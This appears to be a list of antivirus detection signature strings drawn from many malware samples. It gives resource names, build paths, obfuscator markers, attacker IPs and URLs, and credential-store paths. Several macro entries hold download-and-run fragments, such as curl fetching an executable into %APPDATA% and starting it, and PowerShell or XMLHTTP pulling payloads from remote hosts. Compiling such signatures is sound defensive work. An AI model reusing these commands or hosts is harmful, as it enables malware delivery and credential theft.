- fdfsdd.pdll# (PEHSTR_EXT)
- AutoJack.Properties.Resources.resource (PEHSTR_EXT)
- Ltwbdjwjjuzxufa.Knjecun (PEHSTR_EXT)
- Xhfqddgclmqyruymwtncgx.Lopjyqf (PEHSTR_EXT)
- cdn.discordapp.com/attachments/9 (PEHSTR_EXT)
- Abuhcqdzfej.Ogaotrhptsjfsvp (PEHSTR_EXT)
- Bpjymt.Properties.Resources (PEHSTR_EXT)
- Polo.Properties.Resources.resources (PEHSTR_EXT)
- Cubin.Properties.Resources.resources (PEHSTR_EXT)
- g6pwWQ44xKhCXHsvSne.CN4qcq4MclarttE1ndg (PEHSTR_EXT)
- 18.156.82.84/ting/0/loader/uploads/ (PEHSTR_EXT)
- Comedy (PEHSTR_EXT)
- newnewF454.Resources.resources (PEHSTR_EXT)
- cdn.discordapp.com/attachments/95 (PEHSTR_EXT)
- #gfsddfsdffdllsfsfd.dll# (PEHSTR_EXT)
- #gdsdfsdfsfdseedfsldfdssgdhfdggggggdkksg.dll# (PEHSTR_EXT)
- #gffdssdfsfsssedkjdff.dll# (PEHSTR_EXT)
- #gdsdfdfsdfsfdseedfsldfdssgdhfdggggggdkksg.dll# (PEHSTR_EXT)
- RBC III/*E!?< (PEHSTR_EXT)
- J IIU/ (PEHSTR_EXT)
- ^BC IIU/.E!?< (PEHSTR_EXT)
- ShortPdddddddjfjfddddddddddddrocess Completed (PEHSTR_EXT)
- ShortPddddddddddddddddfdddrocess Completed (PEHSTR_EXT)
- ShorsfsftPdddddddddddddddhfghgddddrocess Completed (PEHSTR_EXT)
- ShortPdddddddddddddddddddrocess Completed (PEHSTR_EXT)
- ShorfPdddddddddddddddddddrocess Completed (PEHSTR_EXT)
- ShortPddskjddddddddddrocess Compfsfleted (PEHSTR_EXT)
- ShortPddsaddddddddddddddddddrocess Completed (PEHSTR_EXT)
- #gffdsdsdfsfsssedkjdff.dll# (PEHSTR_EXT)
- aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resource (PEHSTR_EXT)
- KJLDKSDHSDKUI.VECTOR (PEHSTR_EXT)
- .30319\aspnet_co (PEHSTR_EXT)
- bus_ticket.Properties.Resources.resources (PEHSTR_EXT)
- FSA.FSA (PEHSTR_EXT)
- selif/moc.01-nioc-nioc-elif//:ptth (PEHSTR_EXT)
- /teg/hs.refsnart//:sptth (PEHSTR_EXT)
- Nono.Nono (PEHSTR_EXT)
- study.study (PEHSTR_EXT)
- 190.123.44.138/loader/uploads/ (PEHSTR_EXT)
- $Script:ControlServers[$Script:ServerIndex] (PEHSTR_EXT)
- $script:AgentJitter (PEHSTR_EXT)
- .UploadData($ (PEHSTR_EXT)
- @.php (PEHSTR_EXT)
- [System.Net.ServicePointManager]::Expect100Continue=0; (PEHSTR_EXT)
- =New-Object System.Net.WebClient; (PEHSTR_EXT)
- .Headers.Add('User-Agent',$ (PEHSTR_EXT)
- .Headers.Add("Cookie"," (PEHSTR_EXT)
- .Proxy=[System.Net.WebRequest]::DefaultWebProxy; (PEHSTR_EXT)
- $Script:Proxy (PEHSTR_EXT)
- =[System.Text.Encoding]::ASCII.GetBytes(' (PEHSTR_EXT)
- .DownloadData($ser+$t); (PEHSTR_EXT)
- $t='/ (PEHSTR_EXT)
- 0.php'; (PEHSTR_EXT)
- .Headers.Add("User-Agent" (PEHSTR_EXT)
- BoggleServer.Properties.Resources.resources (PEHSTR_EXT)
- amtechprinting.com (PEHSTR_EXT)
- Kndgditsvimlmytdhbigzel.Umpepxei (PEHSTR_EXT)
- ocpi.com.my/smoke/loader/uploads/ (PEHSTR_EXT)
- transfer.sh/get/1gg80l/Nxiisn_Vtcxjhlp.bmp (PEHSTR_EXT)
- inox-smart.com/wp-admin/Nzacczb.png (PEHSTR_EXT)
- transfer.sh/get/5WzkVr/Zvhiaxpms_Uwfisikb.bmp (PEHSTR_EXT)
- 18.179.111.240/1b1/loader/uploads/ (PEHSTR_EXT)
- Xlksyuxtcvbqwnb.Bvfcxrciykakvxanxsbftkj (PEHSTR_EXT)
- Hpranx.Mtlxclkhseirgwne (PEHSTR_EXT)
- MASTERMIND.Properties.Resources.resource (PEHSTR_EXT)
- O /i] (PEHSTR_EXT)
- @+K /Y (PEHSTR_EXT)
- L+O /Y (PEHSTR_EXT)
- vxuuuxuuuxtttxsssrnnnkkkk_```P]]].TTT (PEHSTR_EXT)
- Koahoh.Properties.Resources.resources (PEHSTR_EXT)
- transfer.sh/get/RqVezw/ (PEHSTR_EXT)
- /c ping google.com && timeout 10 (PEHSTR_EXT)
- MineSweeper.Properties.Resources.resources (PEHSTR_EXT)
- BareamMetalsi.Baredll (PEHSTR_EXT)
- Evercraft_model.Character (PEHSTR_EXT)
- .cargo/registry/src/ (PEHSTR)
- AgentTaskcommand (PEHSTR)
- user_outputcompleted (PEHSTR)
- C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\Diary\obj\Debug\Diary.pdb (PEHSTR_EXT)
- Beatems.Properties.Resources.resources (PEHSTR_EXT)
- Hm!\; (PEHSTR_EXT)
- Kdplppvugyosmbtlxjclzra.Mzjlaieiosvosnhbmf (PEHSTR_EXT)
- 54690241_Xyrgockt.bmp (PEHSTR_EXT)
- LILITHAGUESTHOUSE.Resources.resources (PEHSTR_EXT)
- DailyNotes.Resources.resources (PEHSTR_EXT)
- .PAsP (PEHSTR)
- vbStripe.Resources.resources (PEHSTR_EXT)
- sssssrrrrrrrrrddsdas.exe (PEHSTR_EXT)
- C:\somedirectory (PEHSTR_EXT)
- Reporting.asmx (PEHSTR_EXT)
- RecopierBox.Resources.resource (PEHSTR_EXT)
- C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\hastane\obj\Debug\hastane.pdb (PEHSTR_EXT)
- C:\Users\Administrator\Desktop\New folder\bin\Debug\SLN\BillingSystemm\obj\Debug\BillingSystemm.pdb (PEHSTR_EXT)
- BillingSystemm.exe (PEHSTR_EXT)
- hastane.exe (PEHSTR_EXT)
- Cell_Phone_Packages.Resources.resources (PEHSTR_EXT)
- trieutin.com/loader/uploads/ (PEHSTR_EXT)
- aqaygd.Resources (PEHSTR_EXT)
- Pong_fr.Resources.resources (PEHSTR_EXT)
- /upload.php (PEHSTR_EXT)
- SparrowDll.dll (PEHSTR_EXT)
- MyAgent (PEHSTR_EXT)
- Visual_N_Queens_Solver.Properties.Resources.resources (PEHSTR_EXT)
- MatrixEditor.Form1.resources (PEHSTR_EXT)
- 3.70.247.229 (PEHSTR_EXT)
- INFS3160Final.Resources.resources (PEHSTR_EXT)
- Timebox.Properties.Resources.resources (PEHSTR_EXT)
- bin\Debug\SLN\Application_Development\obj\Debug\Application_Development.pdb (PEHSTR_EXT)
- System.Data (PEHSTR_EXT)
- WindowsFormsApp27.Properties (PEHSTR_EXT)
- CU0mxh8nSOsmJDWZHj.MrjSg7KR80F4fcrGf4 (PEHSTR_EXT)
- :^^^^^####^^^^^####bluecovertrading.com/s/ (PEHSTR_EXT)
- YEWHSHJSJUISYUS (PEHSTR_EXT)
- MatchNumberDelegate.Resources.resources (PEHSTR_EXT)
- seddfffffffffffffffffdffexe (PEHSTR_EXT)
- Project.Properties.Resources.resources (PEHSTR_EXT)
- Laboratoire_4.Resources.resources (PEHSTR_EXT)
- dfghrtdbg.Resources.resources (PEHSTR_EXT)
- SplashTest.Properties.Resources (PEHSTR_EXT)
- BookClubManager.My.Resources (PEHSTR_EXT)
- Paraeducator.Properties.Resources.resources (PEHSTR_EXT)
- Concours_Sup.Resources.resources (PEHSTR_EXT)
- HRM_SUB\obj\Debug\HRM_SUB.pdb (PEHSTR_EXT)
- Client.Properties.Resources.resources (PEHSTR_EXT)
- pneuma/commands.execute (PEHSTR_EXT)
- pneuma/commands.getShellCommand (PEHSTR_EXT)
- beacon.(*BeaconIncoming).GetBeacon (PEHSTR_EXT)
- beacon.(*beaconClient).Handle (PEHSTR_EXT)
- (*AgentConfig).BuildBeacon (PEHSTR_EXT)
- (*AgentConfig).BuildSocketBeacon (PEHSTR_EXT)
- Comunication.Properties.Resources.resources (PEHSTR_EXT)
- ScreenToGif Application (PEHSTR_EXT)
- ClassLibrary3.Resources.resources (PEHSTR_EXT)
- RayX.Properties (PEHSTR_EXT)
- C:\sadasd (PEHSTR_EXT)
- Xu_Ly_Da_Thuc.FormMain.resources (PEHSTR_EXT)
- Oversikt.Propertie (PEHSTR_EXT)
- Gdeidnzvlgndkacspspskpw.Uucvjiegwnd (PEHSTR_EXT)
- Vsnishvwuaeiqbiv.Fkkivsrwlqjmvmkwhehr (PEHSTR_EXT)
- Miyfkyaggmgt.Cvdgeznpb (PEHSTR_EXT)
- Tuodqjkjkmvipasqvdrdktfm.Fgucevjuqncyqkc (PEHSTR_EXT)
- Nbwomghltwhyvkknnlwv.Ovkrtdrpwteunda (PEHSTR_EXT)
- Fort.dll (PEHSTR_EXT)
- @System@.@Reflection@.@Assembly@ (PEHSTR_EXT)
- WA1.Resources (PEHSTR_EXT)
- ComboBoxItem1 (PEHSTR_EXT)
- Chrome\Application\chrome.#$% (PEHSTR_EXT)
- bostonbeancafe.Resources.resources (PEHSTR_EXT)
- QuanlyNhahang.Properties.Resources.resource (PEHSTR_EXT)
- YCzhLWEt4m5uruWvb+/wcGOw6HFocepyabLmM28z7HRttOx1 (PEHSTR_EXT)
- Zv7kP24/2kBbgNhBWgHaQlnC2kNDg9KEXMTfxVkF2EZbhtlH (PEHSTR_EXT)
- APCD.PeopleLibrary.Resources.resources (PEHSTR_EXT)
- BatchRunner.Propertie (PEHSTR_EXT)
- TFlow.Properties.Resources.resources (PEHSTR_EXT)
- WindowsApplication1.Resource (PEHSTR_EXT)
- https://radio-hit.ro/ (PEHSTR_EXT)
- Seaxvgs.Properties.Resources.resources (PEHSTR_EXT)
- BalCheck.exe (PEHSTR_EXT)
- Agent.pdb (PEHSTR_EXT)
- Purvile.Resources.r (PEHSTR_EXT)
- 37.0.11.164 (PEHSTR_EXT)
- Renevct_Kmehrfme.png (PEHSTR_EXT)
- BinaryCompatibility (PEHSTR_EXT)
- Excep.tct (PEHSTR_EXT)
- 947\Release\947.pdb (PEHSTR_EXT)
- 113.212.88.126 (PEHSTR_EXT)
- Roaming\Microsoft\Windows\system32 (PEHSTR_EXT)
- system.bin (PEHSTR_EXT)
- Pi@s.Whit@ (PEHSTR_EXT)
- TVqQ$$$$M$$$$$$$$E$$$$$$$$//8$$$$Lg$$$$$$$$$$$$$$$$$$Q$$$ (PEHSTR_EXT)
- \Temp\y3iho40m.vbf (PEHSTR_EXT)
- BackEndLibrary.Properties.Resources (PEHSTR_EXT)
- LOGO_COMPLETA_VETORIZADA (PEHSTR_EXT)
- HelperOne.Properties.Resources.resources (PEHSTR_EXT)
- rOne.Form1.re (PEHSTR_EXT)
- Egra.dll (PEHSTR_EXT)
- ZOo0Ho5qHCVdJhcjIjwqNzNYciAqJiNbIRcxNXM/MDwVOy1r (PEHSTR_EXT)
- C:\NewhTemp (PEHSTR_EXT)
- CompilationRelaxations (PEHSTR_EXT)
- System_CoreInfo.Properties.Resources (PEHSTR_EXT)
- socketprograming.Resource1 (PEHSTR_EXT)
- svchost.Form1.resources (PEHSTR_EXT)
- .Resources.resources (PEHSTR_EXT)
- ConfuserEx v1. (PEHSTR_EXT)
- WLPX_HACK_PRO.Resources.resources (PEHSTR_EXT)
- Confuser.Core 1.6.0+447341964f (PEHSTR_EXT)
- WHGDFHKDLHDJD.dll (PEHSTR_EXT)
- System.Design.Diagram.QM.r (PEHSTR_EXT)
- sEOq.exe (PEHSTR_EXT)
- KoenigseggCCX.Properties.Resources.resource (PEHSTR_EXT)
- ADIn.Resources.resources (PEHSTR_EXT)
- Confuser.Core 1.6.0 (PEHSTR_EXT)
- X l.dlT (PEHSTR_EXT)
- Vjsofo.exe (PEHSTR_EXT)
- gjjjjjsfjdjjjd (PEHSTR_EXT)
- JR.Inno.Setup (PEHSTR_EXT)
- 144.172.83.13/Agent64.bin (PEHSTR_EXT)
- rookbolin.net/Agent64.bin (PEHSTR_EXT)
- 38.108.119.121/Agent64.bin (PEHSTR_EXT)
- VMNVIJSF (PEHSTR_EXT)
- BD_Olympiads.Properties.Resource (PEHSTR_EXT)
- Lt.LE (PEHSTR_EXT)
- kernel3C?dll (PEHSTR_EXT)
- RandomNumberGame.Properties (PEHSTR_EXT)
- GamespyMasterServer.Resources (PEHSTR_EXT)
- C:\somfffffffffffedirectory\ (PEHSTR_EXT)
- GoodVsEvil.Properties.Resource (PEHSTR_EXT)
- StructuralEqualityComparer (PEHSTR_EXT)
- CompareObjectGreaterEqual (PEHSTR_EXT)
- QuestKingdom.WorkerHelper (PEHSTR_EXT)
- OE.PS (PEHSTR_EXT)
- KYOIKU.Resources.resources (PEHSTR_EXT)
- Friedman.Resources.resource (PEHSTR_EXT)
- MK5KGXo6oEkCQRBRBbv/a (PEHSTR_EXT)
- whDyO2NTkdL7/SqKevO7+irjoUy5 (PEHSTR_EXT)
- 4tpIuqqFZgsseIZO8pfKgo/2PSa (PEHSTR_EXT)
- _(-V/sc31f37qk27L_^|2FA9<.resources (PEHSTR_EXT)
- Confuser.Core 1.5.0+b5197549e4 (PEHSTR_EXT)
- Ionic.Zip (PEHSTR_EXT)
- build.exe (PEHSTR_EXT)
- KeysNormalize.d (PEHSTR_EXT)
- DlImageParsr.Properties (PEHSTR_EXT)
- xilecurity_ApplicationId_PolicyManagement_Cmdlets (PEHSTR_EXT)
- source\repos\sync\sync\bin\Debug\Confused\sync_enc.pdb (PEHSTR_EXT)
- fstatvfs@openssh.com (PEHSTR_EXT)
- sync.exe (PEHSTR_EXT)
- IZHs.g.resources (PEHSTR_EXT)
- 85HNqHIeQdRZsuSbkw.KlNobTsUiSkXW7WXH9 (PEHSTR_EXT)
- DynamicDllInvokeType (PEHSTR_EXT)
- iO.fo (PEHSTR_EXT)
- HTTP/1.1 200 (PEHSTR_EXT)
- WinHttpConnect (PEHSTR_EXT)
- EW.YK (PEHSTR_EXT)
- :::::=vba.replace(,"~~","\\"):::::=vba.replace(,"!!",".js"):::::=vba.replace(,"$$","a")="@@~~users~~public~~sys.ini":::::=vba.replace(,"~~","\"):::::=vba.replace(,"@@","c:") (MACROHSTR_EXT)
- @@//b//e:~~c:&users&public&sys.ini" (MACROHSTR_EXT)
- :::::=vba.replace(,"&","\\"):::::=vba.replace(,"@@","wscript.exe"):::::=vba.replace(,"~~","jscript")debug.print:::::set=getobject("new:{72c24dd5-d70a-438b-8a42-98424b88afb8}")debug.print:::::::set=_.__exec!()debug.printendfunction (MACROHSTR_EXT)
- =moneycount.ux+moneycount.tr+monstercoming.z+kon.d+lun.openmarket1245+lun.xxx+showoff.konsa+showoff.t (MACROHSTR_EXT)
- konsa()asstringkonsa=textfilepart.stuff.tagendfunctionfunctiont() (MACROHSTR_EXT)
- Davis11.Properties.Resources.resources (PEHSTR_EXT)
- Options|*.bulkpdf (PEHSTR_EXT)
- rtbLibraries.Text (PEHSTR_EXT)
- options.txt (PEHSTR_EXT)
- BulkPDF.exe (PEHSTR_EXT)
- BulkPDF.Properties.Resources.resources (PEHSTR_EXT)
- uG.B1 (PEHSTR_EXT)
- HBRS.Resources.resource (PEHSTR_EXT)
- GameNetwork.Properties (PEHSTR_EXT)
- Mahjong.Properties.Resources.resources (PEHSTR_EXT)
- usetwo1.command1.controltiptextxt=x1endfunction (MACROHSTR_EXT)
- one=ght.elephant_+llt.loratwo=llt.k+llt.t_+llt.xtthree=one_+two (MACROHSTR_EXT)
- Shell ("cmd /c curl " & O & Taksim() & "/" & Zargen() & "/daviiid.exe" & " --output %APPDATA%\daviiid.exe (MACROHSTR_EXT)
- "htt" & Apasi() & "cdn.d" & Apolize() & "dapp.c" & ankara() & "achments/" (MACROHSTR_EXT)
- WindowsFormsApp96.Forms.Form1.resources (PEHSTR_EXT)
- CaptureMyScreen (PEHSTR_EXT)
- HUPKOMNLBY.exe (PEHSTR_EXT)
- kuliSAP1.Properties.Resources.resource (PEHSTR_EXT)
- SDDSDDSDUJHDGUHIJSGD (PEHSTR_EXT)
- Thumbnail_Handler.Resource (PEHSTR_EXT)
- RainbowUI.Properties.Resource (PEHSTR_EXT)
- sddddffshhdjfffffgjskdgsfacsafp (PEHSTR_EXT)
- Qupla.IndicatorServer.TrayClient (PEHSTR_EXT)
- Strickler.Resources.resources (PEHSTR_EXT)
- .sdata (PEHSTR_EXT)
- _ComCTL (PEHSTR_EXT)
- Martinsville.Resources.resource (PEHSTR_EXT)
- Sanford.Multimedia.Midi.Properties.Resources (PEHSTR_EXT)
- sfhjfkfhfhjsrfhdhffadsfsfhsscfgdb (PEHSTR_EXT)
- 80.66.75.25/pl-Ufbzyarn_Usbqhaee.bmp (PEHSTR_EXT)
- Avalon.g.resources (PEHSTR_EXT)
- HanAgent_pe.exe (PEHSTR_EXT)
- SimFarm.EcoFarm.resources (PEHSTR_EXT)
- Bpgvukp.Properties (PEHSTR_EXT)
- QuanLyNhaDat.Properties.Resources.resource (PEHSTR_EXT)
- Parrott.Red.resources (PEHSTR_EXT)
- Client.Install (PEHSTR_EXT)
- AgentsExhausted (PEHSTR_EXT)
- SCUIYGTDIUYDSG.r (PEHSTR_EXT)
- 185.246.220.65 (PEHSTR_EXT)
- IronPython.Hosting (PEHSTR_EXT)
- IronPython.SQLite (PEHSTR_EXT)
- Agent (PEHSTR_EXT)
- SUc69TNWUOnZBRaQqQ.kcpIYRZI0B6W9uIfSw (PEHSTR_EXT)
- 86a14ad3b7cb44.Resources.resources (PEHSTR_EXT)
- subprocess.Popen(cmd (PEHSTR_EXT)
- .communicate(); (PEHSTR_EXT)
- .request.ProxyHandler(); (PEHSTR_EXT)
- request.build_opener( (PEHSTR_EXT)
- .addheaders=[('User-Agent' (PEHSTR_EXT)
- =urllib.request.urlopen(req).read(); (PEHSTR_EXT)
- .append(chr(char^S[ (PEHSTR_EXT)
- exec(''.join( (PEHSTR_EXT)
- IronPython.dll (PEHSTR_EXT)
- Microsoft.Scripting.Metadata.dll (PEHSTR_EXT)
- ssoo1451.ddns.net:1453/ (PEHSTR_EXT)
- u6nHGiwhHY2jMCJmgs.FtMkWlnaFargBND7mv (PEHSTR_EXT)
- WinForMono.Properties.Resources (PEHSTR_EXT)
- makefil.makefil (PEHSTR_EXT)
- Excerestint.Resources.resources (PEHSTR_EXT)
- Bedford.Resources (PEHSTR_EXT)
- Client Session Agent (PEHSTR_EXT)
- AAAAAAAAAAAAA.r (PEHSTR_EXT)
- CryptoLibrary.dll (PEHSTR_EXT)
- RdpArt.Loader (PEHSTR_EXT)
- Users\Nisha\Desktop\Cracked PasteBin - 1337\Cracked PasteBin\obj\Debug\Setup.pdb (PEHSTR_EXT)
- Cracked_PasteBin.My (PEHSTR_EXT)
- public.class.Main.HelloWorld.module2 (PEHSTR_EXT)
- TabControlExtra.XLLL.resources (PEHSTR_EXT)
- IphwsJS0AL (PEHSTR_EXT)
- BuildEvent.Properties.Resources.resource (PEHSTR_EXT)
- Game2048Form.SFDDWED.resources (PEHSTR_EXT)
- ComSvcCoibers1l1o100 (PEHSTR_EXT)
- -newname{$_-replace'tmp$','exe'}passthru;invoke-webrequest-uri""http://3.65.2.139/read/ (MACROHSTR_EXT)
- .exe""-outfile$tempfile; (MACROHSTR_EXT)
- -newname{$_-replace'tmp$','exe'}passthru;invoke-webrequest-uri""http://173.232.146.78/505/ (MACROHSTR_EXT)
- jpg.exe""-outfile$tempfile; (MACROHSTR_EXT)
- GecikmeHesapla.Properties (PEHSTR_EXT)
- =User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) (PEHSTR)
- A.cfcba541a3cee3d8e12280a110e82cdda (PEHSTR_EXT)
- HvGJoP.My (PEHSTR_EXT)
- vaultcli.dll (PEHSTR_EXT)
- CymulateStagelessMeterpreterDll.dll (PEHSTR_EXT)
- \Cymulate\Agent\AttacksLogs\edr (PEHSTR_EXT)
- ndirmeDenemeleri.pdb (PEHSTR_EXT)
- ScannerService.Resources.resources (PEHSTR_EXT)
- incurable.exe (PEHSTR_EXT)
- https://kedaiorangmelayu.xyz/loader/uploads/withoutstartup_Kkxjpjme.bmp (PEHSTR_EXT)
- withoutstartup.exe (PEHSTR_EXT)
- /loader/uploads/withoutstartup_ (PEHSTR_EXT)
- .bmp (PEHSTR_EXT)
- Make Computer faster and more secure (PEHSTR_EXT)
- .jpg (PEHSTR_EXT)
- mprzrulmemtpoaj.Resource (PEHSTR_EXT)
- Simulateur_des.Properties.Resources.resources (PEHSTR_EXT)
- Simulateur_des.Form1.resources (PEHSTR_EXT)
- ProjectAI.RCSACD (PEHSTR_EXT)
- Engine.Properties.Resources.resources (PEHSTR_EXT)
- SnakesAndLadders.Properties.Resources.resources (PEHSTR_EXT)
- Pinterest_Board_Manager.Resources.resource (PEHSTR_EXT)
- Customers_Simulation.Properties.Resources (PEHSTR_EXT)
- System.Windows.Forms (PEHSTR_EXT)
- #aa.dll# (PEHSTR_EXT)
- #gaa.dll# (PEHSTR_EXT)
- #dshsstadaaadwsssssg.dll# (PEHSTR_EXT)
- UmdParser.Pro (PEHSTR_EXT)
- cd C:\programdata\service\core && cmd.exe /C ""C:\programdata\Windows Events.exe" "C:\programdata\service\core\agent.py"" (PEHSTR_EXT)
- OStock_Simulation.Properties.Resources.resources (PEHSTR_EXT)
- hXxe.exe (PEHSTR_EXT)
- tron.mhxieyi (PEHSTR_EXT)
- HGgGGg7.exe (PEHSTR_EXT)
- Confuser.Core 1.6 (PEHSTR_EXT)
- SGA.Form1.resources (PEHSTR_EXT)
- UQG.d (PEHSTR_EXT)
- AForge.Video (PEHSTR_EXT)
- userAgent (PEHSTR_EXT)
- GamesTest.ResourceInventory.resources (PEHSTR_EXT)
- get_HJSABJDGJSAHDGASJHDGAJHSGD (PEHSTR_EXT)
- radarsystem.Properties.Resources (PEHSTR_EXT)
- waterwheel1.Properties.Resources (PEHSTR_EXT)
- userAgent (PEHSTR)
- @screenshot (PEHSTR)
- RangerUp.DJJDS.resources (PEHSTR_EXT)
- PuzzleGame.Properties.Resources.resource (PEHSTR_EXT)
- Microsoft\VBS3.vbs (PEHSTR_EXT)
- Microsoft\svchcst.exe (PEHSTR_EXT)
- Microsoft\Config.ini (PEHSTR_EXT)
- cmd.exe /c del svchcst.exe (PEHSTR_EXT)
- Start Menu\Programs\Startup\wins.lnk (PEHSTR_EXT)
- CurrentVersion\Run\360safo (PEHSTR_EXT)
- rundll32.exe %sadvpack.dll,DelNodeRunDLL32 (PEHSTR_EXT)
- rundll32.exe %s,InstallHinfSection %s 128 %s (PEHSTR_EXT)
- cmd.exe /d /c bdvipapfxns.bat (PEHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\App Paths (PEHSTR_EXT)
- Command.com /c %s (PEHSTR_EXT)
- Pirates.Resources (PEHSTR_EXT)
- SudokuCWL.Properties.Resources.resources (PEHSTR_EXT)
- GameOfLifeUI.Properties.Resources.resources (PEHSTR_EXT)
- stop-adw.txt (PEHSTR_EXT)
- AdwTest.exe (PEHSTR_EXT)
- WindowsFormsApp60.Properties (PEHSTR_EXT)
- HHGg65.g.resources (PEHSTR_EXT)
- su0UGMRcRFpG45MMHy.40g08Dtsi4VpcKhiXc (PEHSTR_EXT)
- Tjmxm.g.resources (PEHSTR_EXT)
- OPN1LW_v1._1.Properties.Resources.resource (PEHSTR_EXT)
- //topvaluationfirms.com/jahah.png (MACROHSTR_EXT)
- wscript.shell (MACROHSTR_EXT)
- suHB+ScuBcirRqHINViyhwDX4N1at4CX5dIo7NXcgS6KgEvlfNJnmV+24r/6bdkzY5UbXcRzYaXs (PEHSTR_EXT)
- VaTSkHJq4CEkohISP3XYcUhqzW/qMLPgjMDvqEET/rEm1ntXl5jFzlnbYF0JTTHO8DEiWgIQVy (PEHSTR_EXT)
- MG.Office.Editor.frmDebug.resources (PEHSTR_EXT)
- Rkikc.Properties (PEHSTR_EXT)
- Shozbxyxpoj.Properties (PEHSTR_EXT)
- Shrmota_Hyga.My (PEHSTR_EXT)
- Fuck.Properties (PEHSTR_EXT)
- 6sKoVuuBsl_KP-yheX5P/ZNk90HJ6fR0jhMvT5U1e/1-Zd-iJCkcIETQR5OePX/VV3xK13jWT5pRk_BToag (PEHSTR_EXT)
- laplasbuild/clipboard (PEHSTR_EXT)
- GetComputerNameW (PEHSTR_EXT)
- Set-CookieUser-AgentW (PEHSTR_EXT)
- 103.228.36.104/ultron/ (PEHSTR_EXT)
- Ben.dll (PEHSTR_EXT)
- clean_2.Resources.resource (PEHSTR_EXT)
- b58e4c33fd46af.Resources.resource (PEHSTR_EXT)
- CollinsSemesterProject.Resources (PEHSTR_EXT)
- QUANLYDAILY.Properties.Resources.resource (PEHSTR_EXT)
- QLTV.Properties.Resources.resource (PEHSTR_EXT)
- ResourceFailureModel.Properties.Resources (PEHSTR_EXT)
- GUI.Properties.Resources (PEHSTR_EXT)
- CallDescriptor (PEHSTR_EXT)
- ://38.255.43.23/dcd.vdf (PEHSTR_EXT)
- //82.118.21.69/yiy/ (PEHSTR_EXT)
- WindowsApp1.Resources (PEHSTR_EXT)
- lab6.Resources (PEHSTR_EXT)
- \WinDeath\WinDeath\obj\Debug\WinDeath.pdb (PEHSTR_EXT)
- ReAgentc.exe (PEHSTR_EXT)
- /disable (PEHSTR_EXT)
- Finals.Resources (PEHSTR_EXT)
- FinalProject.Resources (PEHSTR_EXT)
- Final_Project.Resources (PEHSTR_EXT)
- billing_system.Resources (PEHSTR_EXT)
- 3.g.resources (PEHSTR_EXT)
- MQ\~ZFCYu[YyjIezDit2NahhLa|_h{vrw}=s|0|sy{fJZH (PEHSTR_EXT)
- Ckrkidaz.Properties (PEHSTR_EXT)
- QuanLyQuanCafe.Properties.Resources (PEHSTR_EXT)
- DormAndMealPlanCalculator.Properties (PEHSTR_EXT)
- CreateObject("Shell.Application") (PEHSTR_EXT)
- H:\PMS\_AUpdate\HanCapture\bin\Release\Agent.pdb (PEHSTR_EXT)
- Shell ("cmd /c curl " & O & (MACROHSTR_EXT)
- () & "/" & (MACROHSTR_EXT)
- () & "/ (MACROHSTR_EXT)
- .exe" & " --output %APPDATA%\ (MACROHSTR_EXT)
- .exe && timeout 1 && start %APPDATA%\ (MACROHSTR_EXT)
- .exe") (MACROHSTR_EXT)
- () & "cdn.d" & (MACROHSTR_EXT)
- () & "dapp.c" & (MACROHSTR_EXT)
- () & "achments/" (MACROHSTR_EXT)
- Phurezjftgg.Properties.Resources (PEHSTR_EXT)
- questionsGenerator.Properties.Resources.resource (PEHSTR_EXT)
- \file1.exe (PEHSTR_EXT)
- WindowsApp3.Resources (PEHSTR_EXT)
- projectqltss.Propertie (PEHSTR_EXT)
- \Windows\CurrentVersion\Run\360sofe (PEHSTR_EXT)
- @Microsoft\Config.ini (PEHSTR_EXT)
- freeglass.resources (PEHSTR_EXT)
- gyREdJKqTD/cborinew.txt (PEHSTR_EXT)
- transfer.sh/get/4BmUkBGNO6/BANGG.txt (PEHSTR_EXT)
- MKLP0998.exe (PEHSTR_EXT)
- ):va8. (PEHSTR_EXT)
- Cluster_MGF.Proper (PEHSTR_EXT)
- InterViewCode.Properties.Resources (PEHSTR_EXT)
- ThucTapNhom1.Properties.Resources (PEHSTR_EXT)
- subdom.dom.com (PEHSTR)
- !Software\Mail.Ru\Agent\mra_logins (PEHSTR)
- <%USERPROFILE%\Application Data\SmartFTP\Client 2.0\Favorites (PEHSTR)
- pipe\systemflagsemafore (PEHSTR)
- $Software\Mail.Ru\Agent\magent_logins (PEHSTR)
- "%TEMP%\smss.exe" (PEHSTR)
- Yuyfizeaz.Properties.Resources (PEHSTR_EXT)
- DLPK.Properties.Resource (PEHSTR_EXT)
- Windows_Pursuit.Properties.Resources (PEHSTR_EXT)
- TriviaNow.QuestionDetails.resource (PEHSTR_EXT)
- jJRDLmG.GDDEDILHDDDVELDDfUf7HUH22y8FlGDDDTYjDjOR7SZDDDDTDFDDDjEj (PEHSTR_EXT)
- CinemaManagement.FrSuatChieu.resources (PEHSTR_EXT)
- screenLogger (PEHSTR_EXT)
- BankingSystemSimulation.Properties.Resources (PEHSTR_EXT)
- shell"po"&l.responsetext,vbhideendsub (MACROHSTR_EXT)
- .open"get","https://raw.githubusercontent.com/frankcastle2/0/main/0j" (MACROHSTR_EXT)
- Quantum.Properties.Resources (PEHSTR_EXT)
- Jeopardy.Properties.Resources.resourc (PEHSTR_EXT)
- QLTHUVIEN.Properties (PEHSTR_EXT)
- AppConnectData.Propertie (PEHSTR_EXT)
- ).Server (PEHSTR_EXT)
- AgentInfo (PEHSTR_EXT)
- github.com/Ne0nd0g (PEHSTR_EXT)
- EU4_Mod_Manager.Resources (PEHSTR_EXT)
- omqtzsoft7W285.dll (PEHSTR_EXT)
- NMKLPO.Properties.Resources (PEHSTR_EXT)
- CellularAutomatonSimulation.MainForm.resources (PEHSTR_EXT)
- ErrorDetectionSimulator.Properties.Resources.resources (PEHSTR_EXT)
- CoreApps.ResourceCS3.resources (PEHSTR_EXT)
- eBookProcessor.XAXASADAWEQW.resources (PEHSTR_EXT)
- eBookProcessor.Resources.resources (PEHSTR_EXT)
- ADGC.g.resources (PEHSTR_EXT)
- FrameworkEntity.MNBVB.resources (PEHSTR_EXT)
- TinyAlertExample.Prope (PEHSTR_EXT)
- TravianGame_WindowsForms.Properties.Resources.resources (PEHSTR_EXT)
- WindowsInterface.Form1.resources (PEHSTR_EXT)
- AgentDelay (PEHSTR_EXT)
- AgentJitter (PEHSTR_EXT)
- ://filebin.net/gdua73i760bj7z51/Jtcuyvqba.dat (PEHSTR_EXT)
- ://remisat.com.uy/non/ (PEHSTR_EXT)
- UDF_Utility.Properties.Resources (PEHSTR_EXT)
